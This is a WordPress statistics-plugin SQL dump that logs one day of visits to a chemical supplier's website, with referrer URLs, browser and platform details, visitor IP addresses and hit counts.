INSERT INTO `wp_statistics_visitor` VALUES (14361, '2016-11-01', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjE6a227obQAhVJrxoKHS78BHMQFggjMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw&bvm=bv.137132246,d.d2s', 'MSIE', 'Windows', '11.0', '', '2.50.7.192', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14362, '2016-11-01', 'https://ttsgco.blogfa.com/', 'Firefox', 'Windows', '20.0', '', '185.72.26.242', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14363, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '160.3.108.206', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14364, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '113.88.77.83', '000', 38, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14365, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.212.122.82', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14366, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '185.25.116.217', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14367, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14368, '2016-11-01', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14369, '2016-11-01', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14370, '2016-11-01', 'https://www.google.si/', 'Chrome', 'Android', '52.0.2743.98', '', '188.64.26.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14371, '2016-11-01', 'https://search.yahoo.co.jp/search?p=miller-stephenson+chemical+3223&aq=-1&oq=&ei=UTF-8&fr=top_of3_sa&x=wrt', 'MSIE', 'Windows', '11.0', '', '219.106.230.204', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14372, '2016-11-01', 'https://www.google.cz/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjjxeShgofQAhXI7xQKHeryAXUQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fopteon-sion%2F&usg=AFQjCNEha4XcRwP6iKRD2yt2wvcFJ-rs7A&sig2=wB_4UL9tNVNEZSeRFvgSKQ', 'MSIE', 'Windows', '11.0', '', '91.139.6.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14373, '2016-11-01', 'https://www.google.co.nz/', 'Safari', 'Macintosh', '9.0.3', '', '122.57.18.133', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14374, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '65.151.2.6', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14375, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '180.173.50.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14376, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '36.0.1985.125', '', '94.97.84.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14377, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&cad=rja&uact=8&ved=0ahUKEwi14ZO5iYfQAhXDAJoKHb8gAAsQFghVMAk&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-200%2F&usg=AFQjCNGuZp1dVA7usitKAo73507wlEdkgQ&bvm=bv.137132246,d.bGs', 'Firefox', 'Windows', '13.0', '', '46.143.51.121', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14378, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '175.197.148.112', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14379, '2016-11-01', 'https://www.google.se/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwjmt-_AiIfQAhVlJpoKHXf4BgwQFggxMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fteflon-severe-service-grease%2F&usg=AFQjCNHmQh-kCwZpRgnMafUXom8yF5W3gQ', 'MSIE', 'Windows', '11.0', '', '194.14.203.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14380, '2016-11-01', 'https://www.google.co.th/', 'Chrome', 'Windows', '54.0.2840.71', '', '124.122.190.38', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14381, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '30.0', '', '54.224.108.80', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14382, '2016-11-01', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/eponex-cycloaliphatic-resin/', 'Firefox', 'Windows', '47.0', '', '173.198.234.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14383, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '43.0.2357.81', '', '213.189.136.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14384, '2016-11-01', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.1', '', '68.204.48.74', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14385, '2016-11-01', 'https://www.asseenontvonline.ru/', 'MSIE', 'Windows', '6.0', '', '178.137.95.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14386, '2016-11-01', 'https://www.google.ch/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwijvMvzlIfQAhXKnBoKHQTVACYQFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fplastic-glass-metal-cleaner%2F&usg=AFQjCNHPWy4BoHCEDieQeBhAcZ0emHXcqw&bvm=bv.137132246,d.d2s', 'MSIE', 'Windows', '11.0', '', '217.150.235.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14387, '2016-11-01', 'https://www.google.co.il/', 'Chrome', 'Windows', '54.0.2840.71', '', '193.106.206.10', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14388, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.93', '', '45.45.193.219', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14389, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.106', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14390, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '88.19.79.29', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14391, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '36.0', '', '45.45.193.125', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14392, '2016-11-01', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '123.235.199.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14393, '2016-11-01', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.155.85.83', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14394, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '14.36.156.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14395, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '174.136.133.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14396, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '107.3.95.149', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14397, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '37.57.33.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14398, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '117.197.248.240', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14399, '2016-11-01', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '138.162.0.43', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14400, '2016-11-01', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '138.162.0.42', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14401, '2016-11-01', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/', 'MSIE', 'Windows', '11.0', '', '138.162.0.41', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14402, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '106.72.162.160', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14403, '2016-11-01', 'https://www.miller-stephenson.com/articles/', 'Safari', 'iPhone', '10.0', '', '24.193.212.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14404, '2016-11-01', 'https://www.google.com.br/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwj07e6arIfQAhWDEJAKHcWGBW4QFgg_MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-828%2F&usg=AFQjCNG-ULz5hPi_elA0tDheufF5SIOMyg', 'MSIE', 'Windows', '11.0', '', '186.227.125.43', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14405, '2016-11-01', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '104.196.42.175', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14406, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.186.160.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14407, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.212.236.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14408, '2016-11-01', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '116.113.28.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14409, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.170', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14410, '2016-11-01', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14411, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjAjfDosofQAhVFWCYKHWSmBZUQFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '192.107.246.82', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14412, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '50.0', '', '207.244.89.108', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14413, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14414, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.191', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14415, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '23.0.1271.97', '', '52.207.61.185', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14416, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '54.0.2840.68', '', '115.66.108.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14417, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '66.80.121.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14418, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CCQQFjAD&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Fkrytox-lubricants%2F&ei=gnsYWK-AELCD0wTkjAE&usg=AFQjCNFJMcZt6xCpXzcHAOYSpI7Q31y8hg', 'Safari', 'iPhone', '9.0', '', '66.102.6.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14419, '2016-11-01', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/krytox-lubricants/', 'Safari', 'iPhone', '9.0', '', '66.102.6.119', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14420, '2016-11-01', 'https://www.google.cz/', 'Chrome', 'Windows', '54.0.2840.71', '', '193.86.243.12', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14421, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '193.105.2.136', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14422, '2016-11-01', 'https://www.miller-stephenson.com/', 'Opera Next', 'Windows', '35.0.2066.37', '', '178.137.213.78', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14423, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '213.192.59.2', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14424, '2016-11-01', 'https://www.miller-stephenson.com/wp-login.php?redirect_to=https%3A%2F%2F104.238.94.202%2F%7Edandill%2Fms%2Fwp-admin%2F&reauth=1', 'Chrome', 'Windows', '54.0.2840.71', '', '24.63.154.108', '000', 54, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14425, '2016-11-01', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.112.23', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14426, '2016-11-01', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14427, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '47.19.59.14', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14428, '2016-11-01', 'https://www.baidu.com/link?url=ErSvb42eoaxX6qnb0R-FP-DU7jSiZZBR3vjTXK7zbZDJJvOiLcs14IJF4dnT4z-m&wd=&eqid=ced41cbe00010c550000000458188461&ie=utf-8', 'Safari', 'iPad', '9.0', '', '114.254.212.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14429, '2016-11-01', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '74.12.225.170', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14430, '2016-11-01', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0.1', '', '188.141.10.64', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14431, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '24.63.154.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14432, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwiyhMHsw4fQAhVIbiYKHV3KDWcQFggiMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fconformal-coatings%2F&usg=AFQjCNF6BrACSYYrQwxy3XIrHbh4DG7M6A', 'MSIE', 'Windows', '11.0', '', '192.189.192.102', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14433, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '21.0.1180.81', '', '219.91.219.46', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14434, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwie89uCxYfQAhUEVyYKHUVlCwMQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,d.eWE', 'MSIE', 'Windows', '11.0', '', '158.147.123.58', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14435, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '184.174.165.216', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14436, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14437, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14438, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.7', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14439, '2016-11-01', 'https://www.google.ru/', 'Chrome', 'Windows', '54.0.2840.71', '', '89.175.162.59', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14440, '2016-11-01', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '75.83.118.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14441, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '35.160.99.181', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14442, '2016-11-01', 'https://forums.pelicanparts.com/911-engine-rebuilding-forum/284737-complete-engine-sealant-thread-16.html', 'Firefox', 'Windows', '49.0', '', '198.202.241.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14443, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '193.194.132.72', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14444, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.112', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14445, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '89.29.171.152', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14446, '2016-11-01', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiwotLpz4fQAhXLB8AKHTfzC7YQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '132.3.25.79', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14447, '2016-11-01', 'https://www.miller-stephenson.com/notify-SubZero?aHR0cDovL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb20v;EWeoK8sXrrITdkmG6dS2sNOtQ3AS7Hm+HdZ2VUXNn1U=', 'MSIE', 'Windows', '11.0', '', '132.3.25.78', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14448, '2016-11-01', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '132.3.25.80', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14449, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '162.83.116.98', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14450, '2016-11-01', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '198.52.59.6', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14451, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '32.213.115.59', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14452, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '216.163.53.250', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14453, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwjN6emD0YfQAhUl7YMKHRxLDZMQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Flubricants%2Ftribosys-lubricants%2Fconnector-lubricants%2F&usg=AFQjCNHUfibmnSo5DfkuTd-5Mx9sov-a1Q&bvm=bv.137132246,d.amc', 'MSIE', 'Windows', '11.0', '', '68.61.180.244', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14454, '2016-11-01', 'https://www.miller-stephenson.com', 'KickFire', 'Unknown', 'Unknown', '', '209.128.119.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14455, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.8', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14456, '2016-11-01', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '77.75.77.123', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14457, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '216.93.241.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14458, '2016-11-01', 'https://www.google.com/', 'Edge', 'Windows', '13.10586', '', '96.81.245.213', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14459, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Macintosh', '50.0.2661.94', '', '40.130.91.34', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14460, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '71.41.20.2', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14461, '2016-11-01', 'https://www.miller-stephenson.com/product/aeroduster-ms-222n/', 'Firefox', 'Windows', '45.0', '', '134.223.230.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14462, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '45.0', '', '216.69.191.112', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14463, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '10.242.41.247', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14464, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14465, '2016-11-01', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'MSIE', 'Windows', '6.0', '', '104.151.223.223', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14466, '2016-11-01', 'https://www.google.com/aclk?sa=L&ai=DChcSEwii04Cr2YfQAhUJkWkKHXx2AGYYABAA&sig=AOD64_3ZXOdrYeCElPgtzq_L_oAfucu05w&rct=j&q=&ved=0ahUKEwiqo_2q2YfQAhUs54MKHWNLCloQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '173.226.153.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14467, '2016-11-01', 'https://www.google.com/aclk?sa=L&ai=DChcSEwitls7224fQAhULL2kKHbddAsUYABAA&sig=AOD64_1pYem0wIxtomlmjGhRlUe3wr2CRA&rct=j&q=&ved=0ahUKEwjFisv224fQAhVrxoMKHbfmBL0Q0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '166.20.224.12', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14468, '2016-11-01', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '192.80.95.231', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14469, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '116.234.215.22', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14470, '2016-11-01', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '199.204.98.186', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14471, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '166.20.224.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14472, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.160.152.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14473, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '132.3.45.81', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14474, '2016-11-01', 'https://www.miller-stephenson.com/notify-SubZero?aHR0cDovL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb20vcHJvZHVjdC9xdWlrLWZyZWV6ZS1hbnRpc3RhdGljLw==;I2VT/9ArA5L+7EVAr8I0Dt8L63evXPptpV7grbPfGB0=', 'MSIE', 'Windows', '11.0', '', '132.3.45.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14475, '2016-11-01', 'https://www.google.com.tr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&cad=rja&uact=8&ved=0ahUKEwjiyrSa3YfQAhWlF8AKHficCzsQFghGMAY&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-103%2F&usg=AFQjCNHHHEWLP0h9DHUf-EigXdOgxVzUYQ&bvm=bv.137132246,d.d24', 'MSIE', 'Windows', '11.0', '', '85.105.15.199', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14476, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '41.33.248.226', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14477, '2016-11-01', 'https://r.search.yahoo.com/_ylt=A0LEV1unohhY_ncAn01XNyoA;_ylu=X3oDMTEyMDNncGFtBGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjE5MTBfMQRzZWMDc3I-/RV=2/RE=1478038311/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=A.7KJp4mMxZRtyXTZlZsiix3hxM-', 'MSIE', 'Windows', '11.0', '', '66.37.66.186', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14478, '2016-11-01', 'https://www.google.com.tw/', 'Chrome', 'Windows', '54.0.2840.71', '', '140.112.243.9', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14479, '2016-11-01', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '96.87.111.20', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14480, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwivhLzw3ofQAhVDQyYKHf_KAWsQFggbMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,d.eWE', 'MSIE', 'Windows', '11.0', '', '132.3.45.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14481, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwiz8K_e34fQAhUC6SYKHWPgBDgQFggsMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fepoxy-resins%2Fepikure-curing-agents%2Fepikure-w-composites%2F&usg=AFQjCNHzMMm4nfWayelq-CkvH8QGcxHOCg&bvm=bv.137132246,d.amc', 'MSIE', 'Windows', '11.0', '', '141.189.251.1', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14482, '2016-11-01', 'https://www.miller-stephenson.com/product/quik-freeze/', 'MSIE', 'Windows', '11.0', '', '132.3.45.80', '000', 2, 0); 
